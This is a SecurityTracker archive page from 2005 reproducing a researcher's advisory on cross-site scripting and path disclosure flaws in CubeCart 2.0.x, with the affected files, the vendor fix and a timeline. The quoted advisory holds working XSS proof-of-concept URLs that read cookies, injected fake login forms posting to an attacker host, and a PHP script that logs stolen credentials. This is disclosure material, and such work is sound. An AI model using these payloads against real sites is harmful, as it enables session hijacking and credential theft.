SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   CubeCart (formerly eStore) Vendors:   brooky.com
CubeCart Input Validation Holes Permit Cross-Site Scripting Attacks and Disclose the Installation Path to Remote Users
SecurityTracker Alert ID:  1013304
SecurityTracker URL:  http://securitytracker.com/id/1013304
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 25 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.0 - 2.0.5
Description:   Lostmon reported some vulnerabilities in CubeCart. A remote user can determine the installation path. A remote user can also conduct cross-site scripting attacks.

The 'admin/Settings.inc.php' script does not properly validate user-supplied input in the cat_id, PHPSESSID, view_doc, product, session, catname, search, and page parameters. This script is called by various other scripts, including:

forgot_pass.php
index.php
login.php
logout.php
new_pass.php
register.php
sale_cat.php
search.php
tellafriend.php
view_doc.php
view_order.php
view_product.php
your_links.php
your_orders.php

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the CubeCart software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can directly call the following scripts to cause the system to display the installation path:

information.php
language.php
list_docs.php
popular_prod.php
sale.php
subfooter.inc.php
subheader.inc.php
cat_navi.php

A demonstration exploit URL is provided:

http://[Target]/path_to_store/cat_navi.php

The vendor was notified on February 15, 2005.

The original advisory is available at:

http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html

Lostmon discovered this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the CubeCart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   The vendor has issued a fixed version (2.0.6) to correct the path disclosure flaws but not the cross-site scripting flaws, available at:

http://www.cubecart.com/site/downloads/

The vendor has also described how to manually apply the fix to version 2.0.5:

http://www.cubecart.com/site/forums/index.php?showtopic=6032

Vendor URL:  www.cubecart.com/site/home/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  CubeCart 2.0.x multiple variable XSS attacks and path disclosure


#################################################################
CubeCart 2.0.x multiple variable XSS attacks and path disclosure
vendor: Devellion Limited
vendor url:http://www.cubecart.com
vendor confirmed :yes exploit avaible: yes
advisore:http://lostmon.blogspot.com/2005/02/cubecart-20x-multiple-variable-xss.html
especific vendor
solution:http://www.cubecart.com/site/forums/index.php?showtopic=6032
#################################################################


CubeCart contains a flaw that allows a remote cross site scripting attack.
This flaw exists because the application does not validate some variables
upon submission to some scripts.This could allow a user to create a specially
crafted URL that would execute arbitrary code in a user's browser within the 
trust relationship between the browser and the server, leading to a
loss of integrity.

admin/Settings.inc.php script is include in all these archives and is
this one that fails
when validate code was send to the other archives accross of the variables.

##################
variables afected:
##################

cat_id
PHPSESSID
view_doc
product
session
catname
search
page

###########################
posible files XSS afected:
###########################

forgot_pass.php 
index.php 
login.php 
logout.php 
new_pass.php 
register.php 
sale_cat.php 
search.php 
tellafriend.php 
view_doc.php 
view_order.php 
view_product.php 
your_links.php  
your_orders.php 



##############################
path disclosure Files afected:
##############################

PoC = http://[Target]/path_to_store/cat_navi.php

information.php
language.php 
list_docs.php 
popular_prod.php 
sale.php
subfooter.inc.php 
subheader.inc.php 
cat_navi.php

###################
versions afected :
###################

2.0.0
2.0.1
2.0.2
2.0.3
2.0.5
2.0.6 fixed path disclosure :)


#####################################################
Some proof of comcept ,but have moooore !!!! :/
#####################################################

http://[Target]/path_to_store/?"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?cat_id=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/forgot_pass.php?catname='pruebas1'"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/index.php?cat_id=5"><body><p><h1>CubeCart
XSS Pow@ !!!</h1></p>/<body>
http://[Target]/path_to_store/view_order.php?session=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/view_order.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/your_orders.php?cat_id="><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/view_product.php?product=1"><script>alert(document.cookie);</script>
http://[Target]/path_to_store/tellafriend.php?product=1&session="><script>alert(document.cookie)</script>
http://[Target]/path_to_store/tellafriend.php?product=1"><script>document.write(document.cookie)</script>
http://[Target]/path_to_store/login.php?session="><script>alert(document.cookie);</script>


http://[Target]/path_to_store/search.php?search=%22%3E%3Cform%20action=
http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=
username%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password
%20type=text%20maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=
Login%3E%3C/form>

http://[Target]/path_to_store/tellafriend.php?product=1%22%3E%3Cform%20action=
http://[Attacker]/savedb.php%20method=post%3EUsername:%3Cinput%20name=username
%20type=text%20maxlength=30%3EPassword:%3Cinput%20name=password%20type=text%20
maxlength=30%3E%3Cinput%20name=Login%20type=submit%20value=Login%3E%3C/form%3E

so many files and variables are afected :(


###########################
foof of concept savedb.php
###########################


<?
$lala = fopen("tostada.txt","a+");
fwrite($lala,"username:".$username."|"."Password:".$password."|");
fclose($lala);
header("Location:http://[target]/path_to_store/login.php");
exit();
?> 

#############################



Change the variable for other  vulnerable or for other file & variable 
so many are vulnerables :P

solution :

  1  - upgrade to version 2.0.6 
 
  1.1- for fixing path disclusure issue ,the Vendor release a fix at 2005-02-21.
       Cubecart 2.0.6 is  not afected ,upgrade your store or aply the fix. 
  
  1.2- For fixing most XSS flaws You need to update your store and wait for
       all changes or wen the vendor release a new version.


#################
release time :
#################


discovered :           2005-02-15
vendor notify:         2005-02-15
vendor respose:        2005-02-15
path disclose.fix:     2005-02-21
XSS fix:               2005-02-25
disclosure date:       2005-02-25 



atentamente 

Lostmon (lostmon@gmail.com)

Thnx to estrella to be my ligth 
Thnx to www.hispanew.com for support
Thnx to cubecart Team ,Good Respose & Good work !!
Thnx To http://www.osvdb.org  

-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/

La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC